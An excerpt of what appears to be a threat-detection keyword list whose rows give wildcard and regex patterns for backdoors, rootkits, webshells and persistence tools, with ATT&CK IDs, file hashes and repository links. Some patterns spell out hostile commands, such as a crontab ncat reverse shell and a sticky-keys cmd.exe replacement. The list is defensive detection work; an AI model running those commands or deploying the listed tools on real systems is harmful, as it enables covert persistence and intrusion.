981*chmod +x evil.php*.{0,1000}chmod\s\+x\sevil\.php.{0,1000}offensive_tool_keywordOWASP rulesOWASP repo of rules - extracted strings for detectionT1100 - T1505.003 - T1059.001TA0003N/AN/APersistencehttps://github.com/coreruleset/coreruleset/10#linuxN/A71025364032025-04-22T10:55:49Z2020-05-13T11:28:52Z38190
982*cmd /c regsvr32.exe /s C:\*\desktop.ini" start= auto*.{0,1000}cmd\s\/c\sregsvr32\.exe\s\/s\sC\:\\.{0,1000}\\desktop\.ini\"\sstart\=\sauto.{0,1000}greyware_tool_keywordregsvr32suspicious service creation executing a desktop.ini file observed in a malware sampleT1543.003TA0003N/AN/APersistencehttps://www.virustotal.com/gui/file/faca8b6f046dad8f0e27a75fa2dc5477d3ccf44adced64481ef1b0dd968b4b0e/behavior10N/AN/A68N/AN/AN/AN/A38404
983*cmd/tsh.go*.{0,1000}cmd\/tsh\.go.{0,1000}offensive_tool_keywordtsh-goTiny SHell Go - An open-source backdoor written in GoT1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009TA0003 - TA0005 - TA0011 - TA0010N/AN/APersistencehttps://github.com/CykuTW/tsh-go10N/AN/A102161162024-08-29T02:59:37Z2022-06-13T16:25:30Z38480
984*cmd/tshd.go*.{0,1000}cmd\/tshd\.go.{0,1000}offensive_tool_keywordtsh-goTiny SHell Go - An open-source backdoor written in GoT1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009TA0003 - TA0005 - TA0011 - TA0010N/AN/APersistencehttps://github.com/CykuTW/tsh-go11N/AN/A102161162024-08-29T02:59:37Z2022-06-13T16:25:30Z38481
985*ColeHouston/Sunder*.{0,1000}ColeHouston\/Sunder.{0,1000}offensive_tool_keywordSunderWindows rootkit designed to work with BYOVD exploitsT1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/ColeHouston/Sunder11N/AN/A102183202025-01-18T10:41:50Z2025-01-10T03:57:05Z38626
986*COM Object hijacking persistence.ps1*.{0,1000}COM\sObject\shijacking\spersistence\.ps1.{0,1000}offensive_tool_keywordCOM-Object-hijackinguse COM Object hijacking to maintain persistence.(Hijack CAccPropServicesClass and MMDeviceEnumerator)T1546.015TA0003N/AN/APersistencehttps://github.com/3gstudent/COM-Object-hijacking10N/AN/A8158302017-08-04T09:19:40Z2017-08-04T08:15:36Z38634
987*COM-Hunter_v*.zip*.{0,1000}COM\-Hunter_v.{0,1000}\.zip.{0,1000}offensive_tool_keywordCOM-HunterCOM-hunter is a COM Hijacking persistnce tool written in C#T1122 - T1055.012TA0003 - TA0005N/AN/APersistencehttps://github.com/nickvourd/COM-Hunter11N/AN/A103289482025-03-11T04:49:55Z2022-05-26T19:34:59Z38661
988*COM-Hunter-main*.{0,1000}COM\-Hunter\-main.{0,1000}offensive_tool_keywordCOM-HunterCOM-hunter is a COM Hijacking persistnce tool written in C#T1122 - T1055.012TA0003 - TA0005N/AN/APersistencehttps://github.com/nickvourd/COM-Hunter11N/AN/A103289482025-03-11T04:49:55Z2022-05-26T19:34:59Z38662
989*Con7ext Shell V.2*.{0,1000}Con7ext\sShell\sV\.2.{0,1000}offensive_tool_keywordOWASP rulesOWASP repo of rules - extracted strings for detectionT1100 - T1505.003 - T1059.001TA0003N/AN/APersistencehttps://github.com/coreruleset/coreruleset/10N/Aphp title webshell71025364032025-04-22T10:55:49Z2020-05-13T11:28:52Z38745
990*Convert-ADCSFlag *.{0,1000}Convert\-ADCSFlag\s.{0,1000}offensive_tool_keywordPoshADCSattack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)T1213.003 - T1213 - T1098.003 - T1098 - T1484.001TA0002 - TA0003 - TA0040N/AN/APersistencehttps://github.com/cfalta/PoshADCS10N/AN/A72186172021-07-07T16:47:07Z2019-10-15T15:54:03Z38809
991*Convert-ADCSPrivateKeyFlag*.{0,1000}Convert\-ADCSPrivateKeyFlag.{0,1000}offensive_tool_keywordPoshADCSattack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)T1213.003 - T1213 - T1098.003 - T1098 - T1484.001TA0002 - TA0003 - TA0040N/AN/APersistencehttps://github.com/cfalta/PoshADCS10N/AN/A72186172021-07-07T16:47:07Z2019-10-15T15:54:03Z38810
992*copy-item *\roaming\microsoft\windows\start menu\programs\startup*.{0,1000}copy\-item\s.{0,1000}\\roaming\\microsoft\\windows\\start\smenu\\programs\\startup.{0,1000}greyware_tool_keywordpowershellCopy file to startup via PowershellT1050 - T1106 - T1547.009TA0003 - TA0005 - TA0004N/AN/APersistenceN/A10N/AN/A78N/AN/AN/AN/A38888
993*cp "/media/windows/Windows/System32/cmd.exe" "/media/windows/Windows/System32/*.{0,1000}cp\s\"\/media\/windows\/Windows\/System32\/cmd\.exe\"\s\"\/media\/windows\/Windows\/System32\/.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate10N/AN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z38929
994*creaktive/tsh*.{0,1000}creaktive\/tsh.{0,1000}offensive_tool_keywordtshUNIX backdoorT1103 - T1105 - T1160 - T1189 - T1496 - T1102TA0003 - TA0005 - TA0011N/AN/APersistencehttps://github.com/creaktive/tsh11#linuxN/A1065681302024-02-20T18:07:08Z2011-05-14T19:15:00Z38982
995*CreateStringPayload("RULER")*.{0,1000}CreateStringPayload\(\"RULER\"\).{0,1000}offensive_tool_keywordrulerA tool to abuse Exchange servicesT1087 - T1110 - T1133 - T1064 - T1204TA0007 - TA0006 - TA0003 - TA0002 - TA0005N/AAPT33Persistencehttps://github.com/sensepost/ruler10N/AN/A101022223622024-06-10T11:03:07Z2016-08-18T15:05:13Z39022
996*Cronos Rootkit.*.{0,1000}Cronos\sRootkit\..{0,1000}offensive_tool_keywordCronos-RootkitCronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.T1055 - T1078 - T1134 - T1562.001TA0001 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/XaFF-XaFF/Cronos-Rootkit10N/AN/AN/A98991862022-03-29T08:26:03Z2021-08-25T08:54:45Z39082
997*CronosDebugger.*.{0,1000}CronosDebugger\..{0,1000}offensive_tool_keywordCronos-RootkitCronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.T1055 - T1078 - T1134 - T1562.001TA0001 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/XaFF-XaFF/Cronos-Rootkit11N/AN/AN/A98991862022-03-29T08:26:03Z2021-08-25T08:54:45Z39083
998*CronosRootkit.*.{0,1000}CronosRootkit\..{0,1000}offensive_tool_keywordCronos-RootkitCronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.T1055 - T1078 - T1134 - T1562.001TA0001 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/XaFF-XaFF/Cronos-Rootkit11N/AN/AN/A98991862022-03-29T08:26:03Z2021-08-25T08:54:45Z39084
999*crontab* sleep *ncat * -e /bin/bash*crontab*.{0,1000}crontab.{0,1000}\ssleep\s.{0,1000}ncat\s.{0,1000}\s\-e\s\/bin\/bash.{0,1000}crontab.{0,1000}greyware_tool_keywordcrontablinux commands abused by attackersT1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002N/AN/APersistenceN/A10#linuxgreyware_tools high risks of false positivesN/AN/AN/AN/AN/AN/A39085
1000*CUPLIS BYPASSS SHELL*.{0,1000}CUPLIS\sBYPASSS\sSHELL.{0,1000}offensive_tool_keywordOWASP rulesOWASP repo of rules - extracted strings for detectionT1100 - T1505.003 - T1059.001TA0003N/AN/APersistencehttps://github.com/coreruleset/coreruleset/10N/Aphp title webshell71025364032025-04-22T10:55:49Z2020-05-13T11:28:52Z39193
1001*cwB0AGEAcgB0ACAAYwBhAGwAYwA=*.{0,1000}cwB0AGEAcgB0ACAAYwBhAGwAYwA\=.{0,1000}offensive_tool_keywordOffensive-Netsh-HelperMaintain Windows Persistence with an evil Netshell Helper DLLT1174 - T1055.011 - T1546.013 - T1574.002 - T1105TA0003 N/AN/APersistencehttps://github.com/rtcrowley/Offensive-Netsh-Helper10N/AN/A911252018-07-28T02:12:09Z2018-07-25T22:49:20Z39289
1002*cybersectroll/SharpPersistSD*.{0,1000}cybersectroll\/SharpPersistSD.{0,1000}offensive_tool_keywordSharpPersistSDA Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machinesT1547 - T1053 - T1027 - T1028 - T1112TA0003 - TA0008N/AN/APersistencehttps://github.com/cybersectroll/SharpPersistSD11N/AN/A10187122024-05-15T14:55:14Z2024-05-13T15:11:12Z39316
1003*CykuTW/tsh-go*.{0,1000}CykuTW\/tsh\-go.{0,1000}offensive_tool_keywordtsh-goTiny SHell Go - An open-source backdoor written in GoT1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009TA0003 - TA0005 - TA0011 - TA0010N/AN/APersistencehttps://github.com/CykuTW/tsh-go11N/AN/A102161162024-08-29T02:59:37Z2022-06-13T16:25:30Z39318
1004*D Y N A S T Y - P E R S I S T*.{0,1000}D\sY\sN\sA\sS\sT\sY\s\s\-\sP\sE\sR\sS\sI\sS\sT.{0,1000}offensive_tool_keywordDynastyPersistLinux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd ServiceT1055 - T1037 - T1078 - T1547 - T1546 - T1556TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Trevohack/DynastyPersist10#linuxN/A92153172024-05-16T05:19:48Z2023-08-13T15:05:42Z39328
1005*d0315c0ae104a656d1b6787f8929a324193f65935b54514107f9ddb7639784d3*.{0,1000}d0315c0ae104a656d1b6787f8929a324193f65935b54514107f9ddb7639784d3.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z39347
1006*d049e53c682c148dc71b1a794973ad8c782014f9f32836c72ad141d05d94f022*.{0,1000}d049e53c682c148dc71b1a794973ad8c782014f9f32836c72ad141d05d94f022.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z39354
1007*d0a793ba054cb2ce81173cdfed434c511aec8c631a3597d9581c191bc1525c2e*.{0,1000}d0a793ba054cb2ce81173cdfed434c511aec8c631a3597d9581c191bc1525c2e.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z39380
1008*d1028ca3bb682ecbf66fcad2425aa322cf5214f6e123a145695047a03ec762a2*.{0,1000}d1028ca3bb682ecbf66fcad2425aa322cf5214f6e123a145695047a03ec762a2.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z39408
1009*d18c5c837e4bdfb76b6c4e6fa7ad0d6e583eec0cadf8184cd9297c77813337c2*.{0,1000}d18c5c837e4bdfb76b6c4e6fa7ad0d6e583eec0cadf8184cd9297c77813337c2.{0,1000}offensive_tool_keywordDispossessorscript used to install anydesk by the Dispossessor groupT1486 - T1490 - T1059 - T1213 - T1078TA0040 - TA0043 - TA0001 - TA0009N/ADispossessorPersistencehttps://vx-underground.org/Archive/Dispossessor%20Leaks10N/AN/A1010N/AN/AN/AN/A39446
1010*d1d106fb03d4ce0018b4a6fe470cf3e9f5428de54f9e3cfeb3b7a20be498869f*.{0,1000}d1d106fb03d4ce0018b4a6fe470cf3e9f5428de54f9e3cfeb3b7a20be498869f.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z39468
1011*d2053465e2b96e8fb144090dd3cb1b7d02c1364f0d66eae234995c89c2f57c64*.{0,1000}d2053465e2b96e8fb144090dd3cb1b7d02c1364f0d66eae234995c89c2f57c64.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z39496
1012*d21cccc6cb3f8313098da5b7ad6a37b5349835a702b5caf8e794a7c6903f40c5*.{0,1000}d21cccc6cb3f8313098da5b7ad6a37b5349835a702b5caf8e794a7c6903f40c5.{0,1000}offensive_tool_keywordTermiteTermite rootit abused by threat actorsT1014 - T1069 - T1055TA0005 - TA0003 - TA0004Operation TunnelSnakeWhiteflyPersistencehttps://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a410#filehashN/A10101561772021-01-26T23:16:49Z2019-01-03T05:01:20Z39503
1013*d29a6e6ff589b020cadb8f8815eafd2a1a6224a1e042e6649c9747e924048dcb*.{0,1000}d29a6e6ff589b020cadb8f8815eafd2a1a6224a1e042e6649c9747e924048dcb.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z39533
1014*d3d1a4bc05989627fc32615a0ec5b280f521577437a7bbce5dbd2e06a9a54602*.{0,1000}d3d1a4bc05989627fc32615a0ec5b280f521577437a7bbce5dbd2e06a9a54602.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z39626
1015*D3m0n1z3dShell-main*.{0,1000}D3m0n1z3dShell\-main.{0,1000}offensive_tool_keywordD3m0n1z3dShellDemonized Shell is an Advanced Tool for persistence in linuxT1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011N/AN/APersistencehttps://github.com/MatheuZSecurity/D3m0n1z3dShell11#linuxN/A104373542025-01-05T13:56:51Z2023-05-30T02:30:47Z39642
1016*d42270ec9fee729c30fd5b96918170c896436b04b863a82d578beff5fd980a6c*.{0,1000}d42270ec9fee729c30fd5b96918170c896436b04b863a82d578beff5fd980a6c.{0,1000}offensive_tool_keywordSunderWindows rootkit designed to work with BYOVD exploitsT1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/ColeHouston/Sunder10#filehashN/A102183202025-01-18T10:41:50Z2025-01-10T03:57:05Z39647
1017*d4962bf59508b527bd83622e1f05a95e3f26f2d7583052744e3d8dcdd08c4556*.{0,1000}d4962bf59508b527bd83622e1f05a95e3f26f2d7583052744e3d8dcdd08c4556.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate10#filehashN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z39678
1018*d57859e45a603966302841da3a61fa3e604a2ddd7be8bb2f1feb9bde74464061*.{0,1000}d57859e45a603966302841da3a61fa3e604a2ddd7be8bb2f1feb9bde74464061.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z39738
1019*d57cbbc5b6f0d223b5a3470a6a444ea4ef49dad718cbe992c92cca935cfdac7d*.{0,1000}d57cbbc5b6f0d223b5a3470a6a444ea4ef49dad718cbe992c92cca935cfdac7d.{0,1000}offensive_tool_keywordTermiteTermite rootit abused by threat actorsT1014 - T1069 - T1055TA0005 - TA0003 - TA0004Operation TunnelSnakeWhiteflyPersistencehttps://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a410#filehashN/A10101561772021-01-26T23:16:49Z2019-01-03T05:01:20Z39742
1020*d5c8e759b790c6ffb3134c8f0aae5865e2ae4c672dc09eaa312bc928fd0d78bd*.{0,1000}d5c8e759b790c6ffb3134c8f0aae5865e2ae4c672dc09eaa312bc928fd0d78bd.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z39761
1021*d650309e0c7cefdb0fd5c2f29e30282d0d2f1be44fc389158c5d011a987245b4*.{0,1000}d650309e0c7cefdb0fd5c2f29e30282d0d2f1be44fc389158c5d011a987245b4.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z39792
1022*d697ea397da7603417baaf232512864bd8ecedde47dd199c2d32f653619f0f3b*.{0,1000}d697ea397da7603417baaf232512864bd8ecedde47dd199c2d32f653619f0f3b.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z39821
1023*d7020b26924bfcef8d88089ad6f9f496cc9b39ed08ffaf3ae857703ae154c198*.{0,1000}d7020b26924bfcef8d88089ad6f9f496cc9b39ed08ffaf3ae857703ae154c198.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z39845
1024*d7f0690e41786270f345ff4851fd4b239631d4c1e7a6b9f74ad139565cbdb2ed*.{0,1000}d7f0690e41786270f345ff4851fd4b239631d4c1e7a6b9f74ad139565cbdb2ed.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z39914
1025*d83164f00776f7b9b32b840d6c7637d3af55fd19eaa351075e98e1cdfc43bf25*.{0,1000}d83164f00776f7b9b32b840d6c7637d3af55fd19eaa351075e98e1cdfc43bf25.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z39929
1026*d836bdb64f2112e1fff1080145cd2f349478ba67e1d68bdfd9e734b114f7627d*.{0,1000}d836bdb64f2112e1fff1080145cd2f349478ba67e1d68bdfd9e734b114f7627d.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z39930
1027*d98fe823414e86c47619bc51a10d542d5be44ab64387e578ba4c21bf8cef9e15*.{0,1000}d98fe823414e86c47619bc51a10d542d5be44ab64387e578ba4c21bf8cef9e15.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z40014
1028*da584a49609de5985f5ba64cfb215f0c30c93fac11563ea32afa3820b3327139*.{0,1000}da584a49609de5985f5ba64cfb215f0c30c93fac11563ea32afa3820b3327139.{0,1000}offensive_tool_keywordTermiteTermite rootit abused by threat actorsT1014 - T1069 - T1055TA0005 - TA0003 - TA0004Operation TunnelSnakeWhiteflyPersistencehttps://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a410#filehashN/A10101561772021-01-26T23:16:49Z2019-01-03T05:01:20Z40060
1029*DAMP-master.zip.{0,1000}DAMP\-master\.zipoffensive_tool_keywordDAMPThe Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.T1222 - T1222.002 - T1548 - T1548.002TA0005 N/AN/APersistencehttps://github.com/HarmJ0y/DAMP11N/AN/A104378792019-07-25T21:18:37Z2018-04-06T22:13:58Z40122
1030*Data Name="ServiceName">procexp</Data>*.{0,1000}Data\sName\=\"ServiceName\"\>procexp\<\/Data\>.{0,1000}offensive_tool_keywordDriverDumpabusing the old process explorer driver to grab a privledged handle to lsass and then dump itT1543 - T1548 - T1562 - T1003 - T1569TA0005 - TA0003 - TA0004 - TA0006 - TA0009N/AN/APersistencehttps://github.com/trustedsec/The_Shelf10N/AServiceName103247142024-11-25T19:33:34Z2024-05-22T14:31:52Z40163
1031*db192e3adff9cfb3777dc44fbe037aee648af60c203832d7a5f7ac41e265f01b*.{0,1000}db192e3adff9cfb3777dc44fbe037aee648af60c203832d7a5f7ac41e265f01b.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z40204
1032*db2c660c7cdfb86957e95790e3bef0a7ebf7fc1b1d7e48b14cbf70210ca87210*.{0,1000}db2c660c7cdfb86957e95790e3bef0a7ebf7fc1b1d7e48b14cbf70210ca87210.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z40214
1033*db32aad6f38b4b0b38b65ba962eb9c256640324f01cef1d9e9eda4a32106a8a5*.{0,1000}db32aad6f38b4b0b38b65ba962eb9c256640324f01cef1d9e9eda4a32106a8a5.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z40217
1034*dbbe29d4095a98dbfc4e2ef1a26e0696f75930a04a274a2a207c0bd0296b7a24*.{0,1000}dbbe29d4095a98dbfc4e2ef1a26e0696f75930a04a274a2a207c0bd0296b7a24.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z40265
1035*dbeab309b7ecd219233a56c43b0c95f88a39c7d1d524d5f71d319a5928a2b5ad*.{0,1000}dbeab309b7ecd219233a56c43b0c95f88a39c7d1d524d5f71d319a5928a2b5ad.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z40286
1036*dd9f9362f115314d3ba6b5eb8e49128fd5052e195a679caae0729640ef42d95f*.{0,1000}dd9f9362f115314d3ba6b5eb8e49128fd5052e195a679caae0729640ef42d95f.{0,1000}greyware_tool_keyworddropbearA smallish SSH server and clientT1021.004 - T1570TA0003N/ACOZY BEARPersistencehttps://github.com/mkj/dropbear10#filehashN/A81018514112025-03-16T12:50:35Z2013-03-19T11:15:36Z40462
1037*ddf4573b4c5fdfd92657979d79b8d8c7658dbb36e9a794628438ff01d7cca1a5*.{0,1000}ddf4573b4c5fdfd92657979d79b8d8c7658dbb36e9a794628438ff01d7cca1a5.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z40484
1038*de09af73cc55f3dfbf6bf40493075b3c93765aa0ad88e34b568eac727f6b0c03*.{0,1000}de09af73cc55f3dfbf6bf40493075b3c93765aa0ad88e34b568eac727f6b0c03.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate10#filehashN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z40500
1039*de0be23b564e470725a91e72bf431667ab1d2d4e8cb318a1c18e66b3ba97340e*.{0,1000}de0be23b564e470725a91e72bf431667ab1d2d4e8cb318a1c18e66b3ba97340e.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z40501
1040*de961474a71ea2f05fd9e9d6b862397660ed559533534bffa03cf9f2f2b70dab*.{0,1000}de961474a71ea2f05fd9e9d6b862397660ed559533534bffa03cf9f2f2b70dab.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z40525
1041*deepce.sh -e *.{0,1000}deepce\.sh\s\-e\s.{0,1000}offensive_tool_keywordD3m0n1z3dShellDemonized Shell is an Advanced Tool for persistence in linuxT1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011N/AN/APersistencehttps://github.com/MatheuZSecurity/D3m0n1z3dShell10#linuxN/A104373542025-01-05T13:56:51Z2023-05-30T02:30:47Z40612
1042*define BACKDOOR_PORT *.{0,1000}define\sBACKDOOR_PORT\s.{0,1000}offensive_tool_keywordWSAAcceptBackdoorWinsock accept() Backdoor ImplantT1574.001 - T1059 - T1213 - T1105 - T1546TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/EgeBalci/WSAAcceptBackdoor10N/AN/A102112232021-02-13T19:18:41Z2021-02-13T15:59:01Z40669
